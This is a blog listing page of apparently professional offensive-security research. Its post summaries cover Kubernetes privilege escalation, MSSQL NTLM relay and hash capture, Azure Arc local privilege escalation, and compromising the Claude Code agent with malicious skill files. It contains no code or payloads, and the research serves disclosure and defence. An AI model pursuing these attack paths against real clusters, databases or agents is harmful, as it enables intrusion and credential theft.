Showing Posts From
Infrastructure Security
-
William Taylor - 1 Jun 2026
Observing Privilege Escalation in Kubernetes
Kubernetes famously has a lot of moving parts; clusters can get complicated very quickly and maintaining best security practice can be a challenge. What can make this harder is when good intentions to enhance security backfire and actually introduce risk. This blog looks at observability tools in Kubernetes environments and how the nature of their positioning within a cluster, along with often higher privileges, can expose privilege escalation paths to attackers.
-
James Henderson - 5 May 2026
Skill Issues: Compromising Claude Code with malicious skills & agents -- Part 1
With the increasing usage of AI Coding agents, can coding agent skill files be exploited as an initial access mechanism, and how? This is part 1 of a 3 part series exploring the attack surface and defensive recommendations
-
Max Keasley 
Owen Reeve 
Sharan Patil - 4 May 2026
Where There Is MSSQL, There Is A Way
Authentication coercion via xp_dirtree and other stored procedures are well known tricks and are often blocked. What if we find other methods to capture Net-NTLMv2 hashes? As the latest organisation joining in the MSSQL EPA and NTLM relay research, we are here to highlight our journey of exploiting MSSQL NTLM Relay.
- Sharan Patil
- 20 Jan 2026
Azure Arc: A Double-Edged Sword
After receiving 5 CVEs and multiple acknowledgements from MSRC for reporting vulnerabilities leading to LPE using various attack vectors, we are finally revealing some of our findings.